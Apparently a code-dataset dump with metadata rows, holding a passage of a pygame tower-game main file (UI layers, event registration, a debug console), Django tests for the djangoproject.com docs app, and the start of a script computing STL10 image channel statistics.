WriteLog.debug(__name__, "初始化商店1图层完成")
    # --- UI9 - shop 2
    Shop2 = ui.Shop2(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    Shop2.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(Shop2)
global_var.set_value("Shop2", Shop2)
WriteLog.debug(__name__, "初始化商店2图层完成")
    # --- UI10 - text box
    TEXTBOX = ui.TextBox(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    TEXTBOX.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(TEXTBOX)
global_var.set_value("TEXTBOX", TEXTBOX)
WriteLog.debug(__name__, "初始化文本框图层完成")
    # --- UI11 - choice box
    CHOICEBOX = ui.ChoiceBox(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    CHOICEBOX.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(CHOICEBOX)
global_var.set_value("CHOICEBOX", CHOICEBOX)
WriteLog.debug(__name__, "初始化选择框图层完成")
    # --- UI12 - damage display layer
    SHOWDAMAGE = ui.ShowDamage(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    SHOWDAMAGE.priority = 65  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(SHOWDAMAGE)
global_var.set_value("SHOWDAMAGE", SHOWDAMAGE)
WriteLog.debug(__name__, "初始化显伤层完成")
    # --- UI13 - color tone (curtain) layer
    CURTAIN = ui.Curtain(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    CURTAIN.priority = 125  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(CURTAIN)
global_var.set_value("CURTAIN", CURTAIN)
WriteLog.debug(__name__, "初始化色调层完成")
WriteLog.info(__name__, "初始化全部UI图层完成")
def init_actions():
# QUIT:
def quit(e):
global running
running = False
return True
    # Register the event handlers
action_control.register_action('QUIT', pygame.QUIT, quit)
action_control.register_action('BOOK', pygame.KEYUP, global_var.get_value('BOOK').action)
action_control.register_action('STARTMENU', pygame.KEYUP, global_var.get_value('STARTMENU').action)
action_control.register_action('BACKPACK', pygame.KEYUP, global_var.get_value('BACKPACK').action)
action_control.register_action('SAVE', pygame.KEYUP, global_var.get_value('SAVE').action)
action_control.register_action('LOAD', pygame.KEYUP, global_var.get_value('LOAD').action)
action_control.register_action('FLY', pygame.KEYUP, global_var.get_value('FLY').action)
action_control.register_action('HELP', pygame.KEYUP, global_var.get_value('HELP').action)
action_control.register_action('Shop1', pygame.KEYUP, global_var.get_value('Shop1').action)
action_control.register_action('Shop2', pygame.KEYUP, global_var.get_value('Shop2').action)
action_control.register_action('TEXTBOX', pygame.KEYUP, global_var.get_value('TEXTBOX').action)
action_control.register_action('CHOICEBOX', pygame.KEYUP, global_var.get_value('CHOICEBOX').action)
action_control.register_action('SHOWDAMAGE', pygame.KEYUP, global_var.get_value('SHOWDAMAGE').action)
action_control.register_action('STATUSBAR', pygame.KEYUP, global_var.get_value('STATUSBAR').action)
action_control.register_action('CURTAIN', pygame.KEYUP, global_var.get_value('CURTAIN').action)
WriteLog.info(__name__, "事件全部注册完成")
def init_sound():
Music = music.MusicWrapper()
global_var.set_value("Music", Music)
WriteLog.info(__name__, "初始化音效完成")
def init_event_flow():
EVENTFLOW = EventFlow()
global_var.set_value("EVENTFLOW", EVENTFLOW)
EVENT = Event()
global_var.set_value("EVENT", EVENT)
EVENT.get_event_flow_module()
EVENTFLOW.get_event_module()
WriteLog.info(__name__, "初始化事件流完成")
def init_function():
FUNCTION = global_var.get_value("FUNCTION")
FUNCTION.init_var()
WriteLog.info(__name__, "初始化function完成")
# DEBUG (toggled in sysconf.py; when enabled, an interactive console is started)
if DEBUG:
import threading
def console():
while running:
r = input()
try:
print(eval(r))
except:
try:
exec(r)
except Exception as e:
print("error:", str(e))
t = threading.Thread(target=console)
t.start()
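    # Illustrative console session (a behavior sketch, assuming stdin is
    # attached): input that eval()s as an expression, e.g. `1 + 1`, has its
    # value printed; anything else falls through to exec().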
init()
init_actions()
init_sound()
init_event_flow()
init_function()
clock = pygame.time.Clock()
STARTMENU = global_var.get_value("STARTMENU")
# Main loop
while running:
# a = pygame.time.get_ticks()
    # Show the start menu
if STARTMENU.new_game == True:
STARTMENU.open()
STARTMENU.new_game = False
        # Enable the damage display by default
show_damage = global_var.get_value("SHOWDAMAGE")
show_damage.open()
        # Enable the status bar by default
status_bar = global_var.get_value("STATUSBAR")
status_bar.open()
        # Make sure the map is active
CurrentMap.active = True
        # Load the initial events
EVENTFLOW = global_var.get_value("EVENTFLOW")
with open(os.path.join(os.getcwd(),"project", "start_text.json")) as f:
start_text = json.load(f)
EVENTFLOW.insert_action(start_text["startText"])
pygame.display.update()
    # Background
    RootScreen.flush(screen)  # flush the rendering to the screen
    action_control.action_render()  # check for action messages
# b = pygame.time.get_ticks()
# print(b - a)
| 35.167315
| 105
| 0.700929
|
import pygame
import os
import json
import platform
import ctypes
from sysconf import *
pygame.init()
if platform.system() == "Windows":
ctypes.windll.user32.SetProcessDPIAware()
screen = pygame.display.set_mode([WIDTH, HEIGHT])
pygame.display.set_caption(TOWER_NAME)
from lib.utools import *
from lib import CurrentMap, PlayerCon, WriteLog
from lib.ground import GroundSurface
from lib import global_var
from lib.event import EventFlow, Event
from project.block import BlockData
RootScreen = GroundSurface(mode="copy", surface=screen)
running = True
from lib import ui
from lib import actions
action_control = actions.ActionControl()
from lib import music
def init():
global_var.set_value("font_name", FONT_NAME)
global_var.set_value("RootScreen", RootScreen)
global_var.set_value("action_control", action_control)
global_var.set_value("PlayerCon", PlayerCon)
CurrentMap.set_map(PLAYER_FLOOR)
CurrentMap.add_sprite(PlayerCon)
global_var.set_value("CurrentMap", CurrentMap)
WriteLog.debug(__name__, "初始化地图完成")
BlockDataReverse = {}
for map_obj in BlockData:
block_id = BlockData[map_obj]["id"]
BlockDataReverse[block_id] = map_obj
global_var.set_value("BlockDataReverse", BlockDataReverse)
StatusBarArea = RootScreen.add_child("left", BLOCK_UNIT * 4)
StatusBarArea.priority = 15
RootScreen.add_child(CurrentMap)
STATUSBAR = ui.StatusBar(mode='copy', surface=RootScreen)
STATUSBAR.priority = 145
RootScreen.add_child(STATUSBAR)
global_var.set_value("STATUSBAR", STATUSBAR)
WriteLog.debug(__name__, "初始化状态栏图层完成")
BOOK = ui.Book(mode='copy', surface=RootScreen)
BOOK.priority = 140
RootScreen.add_child(BOOK)
global_var.set_value("BOOK", BOOK)
WriteLog.debug(__name__, "初始化怪物手册图层完成")
STARTMENU = ui.StartMenu(mode='copy', surface=RootScreen)
STARTMENU.priority = 500
RootScreen.add_child(STARTMENU)
global_var.set_value("STARTMENU", STARTMENU)
WriteLog.debug(__name__, "初始化开始界面图层完成")
BACKPACK = ui.Backpack(mode='copy', surface=RootScreen)
BACKPACK.priority = 150
RootScreen.add_child(BACKPACK)
global_var.set_value("BACKPACK", BACKPACK)
WriteLog.debug(__name__, "初始化背包图层完成")
SAVE = ui.SaveMenu(mode='copy', surface=RootScreen)
SAVE.priority = 140
RootScreen.add_child(SAVE)
global_var.set_value("SAVE", SAVE)
WriteLog.debug(__name__, "初始化存档图层完成")
LOAD = ui.LoadMenu(mode='copy', surface=RootScreen)
LOAD.priority = 140
RootScreen.add_child(LOAD)
global_var.set_value("LOAD", LOAD)
WriteLog.debug(__name__, "初始化读档图层完成")
FLY = ui.Fly(mode='copy', surface=RootScreen)
FLY.priority = 140
RootScreen.add_child(FLY)
global_var.set_value("FLY", FLY)
WriteLog.debug(__name__, "初始化楼层传送器图层完成")
HELP = ui.Help(mode='copy', surface=RootScreen)
HELP.priority = 140
RootScreen.add_child(HELP)
global_var.set_value("HELP", HELP)
WriteLog.debug(__name__, "初始化帮助图层完成")
Shop1 = ui.Shop1(mode='copy', surface=RootScreen)
Shop1.priority = 140
RootScreen.add_child(Shop1)
global_var.set_value("Shop1", Shop1)
WriteLog.debug(__name__, "初始化商店1图层完成")
Shop2 = ui.Shop2(mode='copy', surface=RootScreen)
Shop2.priority = 140
RootScreen.add_child(Shop2)
global_var.set_value("Shop2", Shop2)
WriteLog.debug(__name__, "初始化商店2图层完成")
TEXTBOX = ui.TextBox(mode='copy', surface=RootScreen)
TEXTBOX.priority = 140
RootScreen.add_child(TEXTBOX)
global_var.set_value("TEXTBOX", TEXTBOX)
WriteLog.debug(__name__, "初始化文本框图层完成")
CHOICEBOX = ui.ChoiceBox(mode='copy', surface=RootScreen)
CHOICEBOX.priority = 140
RootScreen.add_child(CHOICEBOX)
global_var.set_value("CHOICEBOX", CHOICEBOX)
WriteLog.debug(__name__, "初始化选择框图层完成")
SHOWDAMAGE = ui.ShowDamage(mode='copy', surface=RootScreen)
SHOWDAMAGE.priority = 65
RootScreen.add_child(SHOWDAMAGE)
global_var.set_value("SHOWDAMAGE", SHOWDAMAGE)
WriteLog.debug(__name__, "初始化显伤层完成")
CURTAIN = ui.Curtain(mode='copy', surface=RootScreen)
CURTAIN.priority = 125
RootScreen.add_child(CURTAIN)
global_var.set_value("CURTAIN", CURTAIN)
WriteLog.debug(__name__, "初始化色调层完成")
WriteLog.info(__name__, "初始化全部UI图层完成")
def init_actions():
def quit(e):
global running
running = False
return True
action_control.register_action('QUIT', pygame.QUIT, quit)
action_control.register_action('BOOK', pygame.KEYUP, global_var.get_value('BOOK').action)
action_control.register_action('STARTMENU', pygame.KEYUP, global_var.get_value('STARTMENU').action)
action_control.register_action('BACKPACK', pygame.KEYUP, global_var.get_value('BACKPACK').action)
action_control.register_action('SAVE', pygame.KEYUP, global_var.get_value('SAVE').action)
action_control.register_action('LOAD', pygame.KEYUP, global_var.get_value('LOAD').action)
action_control.register_action('FLY', pygame.KEYUP, global_var.get_value('FLY').action)
action_control.register_action('HELP', pygame.KEYUP, global_var.get_value('HELP').action)
action_control.register_action('Shop1', pygame.KEYUP, global_var.get_value('Shop1').action)
action_control.register_action('Shop2', pygame.KEYUP, global_var.get_value('Shop2').action)
action_control.register_action('TEXTBOX', pygame.KEYUP, global_var.get_value('TEXTBOX').action)
action_control.register_action('CHOICEBOX', pygame.KEYUP, global_var.get_value('CHOICEBOX').action)
action_control.register_action('SHOWDAMAGE', pygame.KEYUP, global_var.get_value('SHOWDAMAGE').action)
action_control.register_action('STATUSBAR', pygame.KEYUP, global_var.get_value('STATUSBAR').action)
action_control.register_action('CURTAIN', pygame.KEYUP, global_var.get_value('CURTAIN').action)
WriteLog.info(__name__, "事件全部注册完成")
def init_sound():
Music = music.MusicWrapper()
global_var.set_value("Music", Music)
WriteLog.info(__name__, "初始化音效完成")
def init_event_flow():
EVENTFLOW = EventFlow()
global_var.set_value("EVENTFLOW", EVENTFLOW)
EVENT = Event()
global_var.set_value("EVENT", EVENT)
EVENT.get_event_flow_module()
EVENTFLOW.get_event_module()
WriteLog.info(__name__, "初始化事件流完成")
def init_function():
FUNCTION = global_var.get_value("FUNCTION")
FUNCTION.init_var()
WriteLog.info(__name__, "初始化function完成")
if DEBUG:
import threading
def console():
while running:
r = input()
try:
print(eval(r))
except:
try:
exec(r)
except Exception as e:
print("error:", str(e))
t = threading.Thread(target=console)
t.start()
init()
init_actions()
init_sound()
init_event_flow()
init_function()
clock = pygame.time.Clock()
STARTMENU = global_var.get_value("STARTMENU")
while running:
if STARTMENU.new_game == True:
STARTMENU.open()
STARTMENU.new_game = False
show_damage = global_var.get_value("SHOWDAMAGE")
show_damage.open()
status_bar = global_var.get_value("STATUSBAR")
status_bar.open()
CurrentMap.active = True
EVENTFLOW = global_var.get_value("EVENTFLOW")
with open(os.path.join(os.getcwd(),"project", "start_text.json")) as f:
start_text = json.load(f)
EVENTFLOW.insert_action(start_text["startText"])
pygame.display.update()
RootScreen.flush(screen)
action_control.action_render()
| true
| true
|
f70b6058884bd02f5b51d29c0313f747701475ac
| 11,761
|
py
|
Python
|
docs/tests.py
|
dineshsonachalam/djangoproject.com
|
4fff6b48be275f97b060ce05de0e55e453a1b5f9
|
[
"BSD-3-Clause"
] | null | null | null |
docs/tests.py
|
dineshsonachalam/djangoproject.com
|
4fff6b48be275f97b060ce05de0e55e453a1b5f9
|
[
"BSD-3-Clause"
] | null | null | null |
docs/tests.py
|
dineshsonachalam/djangoproject.com
|
4fff6b48be275f97b060ce05de0e55e453a1b5f9
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
import os
from http import HTTPStatus
from operator import attrgetter
from pathlib import Path
from django.conf import settings
from django.contrib.sites.models import Site
from django.template import Context, Template
from django.test import TestCase
from django.urls import reverse, set_urlconf
from djangoproject.urls import www as www_urls
from releases.models import Release
from .models import Document, DocumentRelease
from .sitemaps import DocsSitemap
from .utils import get_doc_path
class ModelsTests(TestCase):
def test_dev_is_supported(self):
"""
Document for a release without a date ("dev") is supported.
"""
d = DocumentRelease.objects.create()
self.assertTrue(d.is_supported)
self.assertTrue(d.is_dev)
def test_current_is_supported(self):
"""
Document with a release without an EOL date is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_previous_is_supported(self):
"""
Document with a release with an EOL date in the future is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day,
eol_date=today + 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_old_is_unsupported(self):
"""
        Document with a release with an EOL date in the past is unsupported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day,
eol_date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertFalse(d.is_supported)
self.assertFalse(d.is_dev)
def test_most_recent_micro_release_considered(self):
"""
Dates are looked up on the latest micro release in a given series.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day)
d = DocumentRelease.objects.create(release=r)
r2 = Release.objects.create(version='1.8.1',
date=today - 5 * day)
# The EOL date of the first release is set automatically.
r.refresh_from_db()
self.assertEqual(r.eol_date, r2.date)
# Since 1.8.1 is still supported, docs show up as supported.
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
class ManagerTests(TestCase):
@classmethod
def setUpTestData(cls):
r1 = Release.objects.create(version='1.0')
r2 = Release.objects.create(version='2.0')
DocumentRelease.objects.bulk_create(
DocumentRelease(lang=lang, release=release)
for lang, release in [('en', r1), ('en', r2), ('sv', r1), ('ar', r1)]
)
def test_by_version(self):
doc_releases = DocumentRelease.objects.by_version('1.0')
self.assertEqual(
{(r.lang, r.release.version) for r in doc_releases},
{('en', '1.0'), ('sv', '1.0'), ('ar', '1.0')}
)
def test_get_by_version_and_lang_exists(self):
doc = DocumentRelease.objects.get_by_version_and_lang('1.0', 'en')
self.assertEqual(doc.release.version, '1.0')
self.assertEqual(doc.lang, 'en')
def test_get_by_version_and_lang_missing(self):
with self.assertRaises(DocumentRelease.DoesNotExist):
DocumentRelease.objects.get_by_version_and_lang('2.0', 'sv')
def test_get_available_languages_by_version(self):
get = DocumentRelease.objects.get_available_languages_by_version
self.assertEqual(list(get('1.0')), ['ar', 'en', 'sv'])
self.assertEqual(list(get('2.0')), ['en'])
self.assertEqual(list(get('3.0')), [])
class RedirectsTests(TestCase):
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_team_url(self):
# This URL is linked from the docs.
self.assertEqual('/foundation/teams/', reverse('members:teams', urlconf=www_urls))
def test_internals_team(self):
response = self.client.get(
'/en/dev/internals/team/',
HTTP_HOST='docs.djangoproject.dev:8000',
)
self.assertRedirects(
response,
'https://www.djangoproject.com/foundation/teams/',
status_code=HTTPStatus.MOVED_PERMANENTLY,
fetch_redirect_response=False,
)
class SearchFormTestCase(TestCase):
fixtures = ['doc_test_fixtures']
def setUp(self):
# We need to create an extra Site because docs have SITE_ID=2
Site.objects.create(name='Django test', domain="example2.com")
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_empty_get(self):
response = self.client.get('/en/dev/search/',
HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 200)
class TemplateTagTests(TestCase):
def test_pygments_template_tag(self):
template = Template('''
{% load docs %}
{% pygment 'python' %}
def band_listing(request):
"""A view of all bands."""
bands = models.Band.objects.all()
return render(request, 'bands/band_listing.html', {'bands': bands})
{% endpygment %}
''')
self.assertHTMLEqual(
template.render(Context()),
"""
<div class="highlight">
<pre>
<span></span>
<span class="k">def</span><span class="nf">band_listing</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">):</span>
<span class="sd">"""A view of all bands."""</span>
<span class="n">bands</span> <span class="o">=</span>
<span class="n">models</span><span class="o">.</span>
<span class="n">Band</span><span class="o">.</span>
<span class="n">objects</span><span class="o">.</span>
<span class="n">all</span><span class="p">()</span>
<span class="k">return</span> <span class="n">render</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">,</span>
<span class="s1">'bands/band_listing.html'</span>
<span class="p">,</span> <span class="p">{</span>
<span class="s1">'bands'</span><span class="p">:</span>
<span class="n">bands</span><span class="p">})</span>
</pre>
</div>
"""
)
class TestUtils(TestCase):
def test_get_doc_path(self):
# non-existent file
self.assertEqual(get_doc_path(Path('root'), 'subpath.txt'), None)
# existing file
path, filename = __file__.rsplit(os.path.sep, 1)
self.assertEqual(get_doc_path(Path(path), filename), None)
class UpdateDocTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.release = DocumentRelease.objects.create()
def test_sync_to_db(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_clean_path(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar/index',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_title_strip_tags(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the <strong>title</strong>',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['This is the title'], transform=attrgetter('title'))
def test_title_entities(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'Title & title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['Title & title'], transform=attrgetter('title'))
def test_empty_documents(self):
self.release.sync_to_db([
{'title': 'Empty body document', 'current_page_name': 'foo/1'},
{'body': 'Empty title document', 'current_page_name': 'foo/2'},
{'current_page_name': 'foo/3'},
])
self.assertQuerysetEqual(self.release.documents.all(), [])
def test_excluded_documents(self):
"""
Documents aren't created for partially translated documents excluded
from robots indexing.
"""
# Read the first Disallow line of robots.txt.
robots_path = settings.BASE_DIR.joinpath('djangoproject', 'static', 'robots.docs.txt')
with open(str(robots_path), 'r') as fh:
for line in fh:
if line.startswith("Disallow:"):
break
_, lang, version, path = line.strip().split('/')
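        # e.g. a line like "Disallow: /ar/1.0/excluded" splits into
        # ('Disallow: ', 'ar', '1.0', 'excluded') (illustrative values).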
release = DocumentRelease.objects.create(
lang=lang, release=Release.objects.create(version=version),
)
release.sync_to_db([
{'body': '', 'title': '', 'current_page_name': 'nonexcluded/bar'},
{'body': '', 'title': '', 'current_page_name': '%s/bar' % path},
])
self.assertQuerysetEqual(
release.documents.all(),
['<Document: %s/%s/nonexcluded/bar>' % (lang, version)]
)
class SitemapTests(TestCase):
fixtures = ['doc_test_fixtures']
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_sitemap_index(self):
response = self.client.get('/sitemap.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertContains(response, '<sitemap>', count=2)
self.assertContains(response, '<loc>http://docs.djangoproject.dev:8000/sitemap-en.xml</loc>')
def test_sitemap(self):
doc_release = DocumentRelease.objects.create()
document = Document.objects.create(release=doc_release)
sitemap = DocsSitemap('en')
urls = sitemap.get_urls()
self.assertEqual(len(urls), 1)
url_info = urls[0]
self.assertEqual(url_info['location'], document.get_absolute_url())
def test_sitemap_404(self):
response = self.client.get('/sitemap-xx.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 404)
self.assertEqual(
response.context['exception'],
"No sitemap available for section: 'xx'"
)
| 36.299383
| 116
| 0.590426
|
import datetime
import os
from http import HTTPStatus
from operator import attrgetter
from pathlib import Path
from django.conf import settings
from django.contrib.sites.models import Site
from django.template import Context, Template
from django.test import TestCase
from django.urls import reverse, set_urlconf
from djangoproject.urls import www as www_urls
from releases.models import Release
from .models import Document, DocumentRelease
from .sitemaps import DocsSitemap
from .utils import get_doc_path
class ModelsTests(TestCase):
def test_dev_is_supported(self):
d = DocumentRelease.objects.create()
self.assertTrue(d.is_supported)
self.assertTrue(d.is_dev)
def test_current_is_supported(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_previous_is_supported(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day,
eol_date=today + 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_old_is_unsupported(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day,
eol_date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertFalse(d.is_supported)
self.assertFalse(d.is_dev)
def test_most_recent_micro_release_considered(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day)
d = DocumentRelease.objects.create(release=r)
r2 = Release.objects.create(version='1.8.1',
date=today - 5 * day)
r.refresh_from_db()
self.assertEqual(r.eol_date, r2.date)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
class ManagerTests(TestCase):
@classmethod
def setUpTestData(cls):
r1 = Release.objects.create(version='1.0')
r2 = Release.objects.create(version='2.0')
DocumentRelease.objects.bulk_create(
DocumentRelease(lang=lang, release=release)
for lang, release in [('en', r1), ('en', r2), ('sv', r1), ('ar', r1)]
)
def test_by_version(self):
doc_releases = DocumentRelease.objects.by_version('1.0')
self.assertEqual(
{(r.lang, r.release.version) for r in doc_releases},
{('en', '1.0'), ('sv', '1.0'), ('ar', '1.0')}
)
def test_get_by_version_and_lang_exists(self):
doc = DocumentRelease.objects.get_by_version_and_lang('1.0', 'en')
self.assertEqual(doc.release.version, '1.0')
self.assertEqual(doc.lang, 'en')
def test_get_by_version_and_lang_missing(self):
with self.assertRaises(DocumentRelease.DoesNotExist):
DocumentRelease.objects.get_by_version_and_lang('2.0', 'sv')
def test_get_available_languages_by_version(self):
get = DocumentRelease.objects.get_available_languages_by_version
self.assertEqual(list(get('1.0')), ['ar', 'en', 'sv'])
self.assertEqual(list(get('2.0')), ['en'])
self.assertEqual(list(get('3.0')), [])
class RedirectsTests(TestCase):
@classmethod
def tearDownClass(cls):
set_urlconf(None)
super().tearDownClass()
def test_team_url(self):
self.assertEqual('/foundation/teams/', reverse('members:teams', urlconf=www_urls))
def test_internals_team(self):
response = self.client.get(
'/en/dev/internals/team/',
HTTP_HOST='docs.djangoproject.dev:8000',
)
self.assertRedirects(
response,
'https://www.djangoproject.com/foundation/teams/',
status_code=HTTPStatus.MOVED_PERMANENTLY,
fetch_redirect_response=False,
)
class SearchFormTestCase(TestCase):
fixtures = ['doc_test_fixtures']
def setUp(self):
Site.objects.create(name='Django test', domain="example2.com")
@classmethod
def tearDownClass(cls):
set_urlconf(None)
super().tearDownClass()
def test_empty_get(self):
response = self.client.get('/en/dev/search/',
HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 200)
class TemplateTagTests(TestCase):
def test_pygments_template_tag(self):
template = Template('''
{% load docs %}
{% pygment 'python' %}
def band_listing(request):
"""A view of all bands."""
bands = models.Band.objects.all()
return render(request, 'bands/band_listing.html', {'bands': bands})
{% endpygment %}
''')
self.assertHTMLEqual(
template.render(Context()),
"""
<div class="highlight">
<pre>
<span></span>
<span class="k">def</span><span class="nf">band_listing</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">):</span>
<span class="sd">"""A view of all bands."""</span>
<span class="n">bands</span> <span class="o">=</span>
<span class="n">models</span><span class="o">.</span>
<span class="n">Band</span><span class="o">.</span>
<span class="n">objects</span><span class="o">.</span>
<span class="n">all</span><span class="p">()</span>
<span class="k">return</span> <span class="n">render</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">,</span>
<span class="s1">'bands/band_listing.html'</span>
<span class="p">,</span> <span class="p">{</span>
<span class="s1">'bands'</span><span class="p">:</span>
<span class="n">bands</span><span class="p">})</span>
</pre>
</div>
"""
)
class TestUtils(TestCase):
def test_get_doc_path(self):
self.assertEqual(get_doc_path(Path('root'), 'subpath.txt'), None)
path, filename = __file__.rsplit(os.path.sep, 1)
self.assertEqual(get_doc_path(Path(path), filename), None)
class UpdateDocTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.release = DocumentRelease.objects.create()
def test_sync_to_db(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_clean_path(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar/index',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_title_strip_tags(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the <strong>title</strong>',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['This is the title'], transform=attrgetter('title'))
def test_title_entities(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'Title & title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['Title & title'], transform=attrgetter('title'))
def test_empty_documents(self):
self.release.sync_to_db([
{'title': 'Empty body document', 'current_page_name': 'foo/1'},
{'body': 'Empty title document', 'current_page_name': 'foo/2'},
{'current_page_name': 'foo/3'},
])
self.assertQuerysetEqual(self.release.documents.all(), [])
def test_excluded_documents(self):
robots_path = settings.BASE_DIR.joinpath('djangoproject', 'static', 'robots.docs.txt')
with open(str(robots_path), 'r') as fh:
for line in fh:
if line.startswith("Disallow:"):
break
_, lang, version, path = line.strip().split('/')
release = DocumentRelease.objects.create(
lang=lang, release=Release.objects.create(version=version),
)
release.sync_to_db([
{'body': '', 'title': '', 'current_page_name': 'nonexcluded/bar'},
{'body': '', 'title': '', 'current_page_name': '%s/bar' % path},
])
self.assertQuerysetEqual(
release.documents.all(),
['<Document: %s/%s/nonexcluded/bar>' % (lang, version)]
)
class SitemapTests(TestCase):
fixtures = ['doc_test_fixtures']
@classmethod
def tearDownClass(cls):
set_urlconf(None)
super().tearDownClass()
def test_sitemap_index(self):
response = self.client.get('/sitemap.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertContains(response, '<sitemap>', count=2)
self.assertContains(response, '<loc>http://docs.djangoproject.dev:8000/sitemap-en.xml</loc>')
def test_sitemap(self):
doc_release = DocumentRelease.objects.create()
document = Document.objects.create(release=doc_release)
sitemap = DocsSitemap('en')
urls = sitemap.get_urls()
self.assertEqual(len(urls), 1)
url_info = urls[0]
self.assertEqual(url_info['location'], document.get_absolute_url())
def test_sitemap_404(self):
response = self.client.get('/sitemap-xx.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 404)
self.assertEqual(
response.context['exception'],
"No sitemap available for section: 'xx'"
)
| true
| true
|
f70b61cb8859600b367959872158a264f1e91bc4
| 1,215
|
py
|
Python
|
data/cal_mean_std.py
|
PaulTHong/STDA-inf
|
3d87a7843f879d17a343ba4838caa1f58f1e8e65
|
[
"MIT"
] | 1
|
2022-02-21T04:44:09.000Z
|
2022-02-21T04:44:09.000Z
|
data/cal_mean_std.py
|
PaulTHong/STDA-inf
|
3d87a7843f879d17a343ba4838caa1f58f1e8e65
|
[
"MIT"
] | null | null | null |
data/cal_mean_std.py
|
PaulTHong/STDA-inf
|
3d87a7843f879d17a343ba4838caa1f58f1e8e65
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import os
mean = []
std = []
img_list = []
dir_path = './STL10-data/train'
class_paths = os.listdir(dir_path)
print(class_paths)
for cls in class_paths:
img_paths = os.listdir(dir_path + os.sep + cls)
print(len(img_paths))
for img_path in img_paths:
print(img_path)
img_path = dir_path + os.sep + cls + os.sep + img_path
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
        img = img[:, :, :, np.newaxis]  # add a trailing sample axis so images stack along axis 3
img_list.append(img)
# dir_path = './STL10-data/test'
# class_paths = os.listdir(dir_path)
# print(class_paths)
# for cls in class_paths:
# img_paths = os.listdir(dir_path + os.sep + cls)
# print(len(img_paths))
# for img_path in img_paths:
# print(img_path)
# img_path = dir_path + os.sep + cls + os.sep + img_path
# img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# img = img[:, :, :, np.newaxis]
# img_list.append(img)
imgs = np.concatenate(img_list, axis=3)
imgs = imgs.astype(np.float32) / 255.0
for i in range(3):
channel = imgs[:, :, i, :].ravel()
mean.append(np.mean(channel))
std.append(np.std(channel))
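# cv2.imread returns channels in BGR order; reversing reports the stats as RGB.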
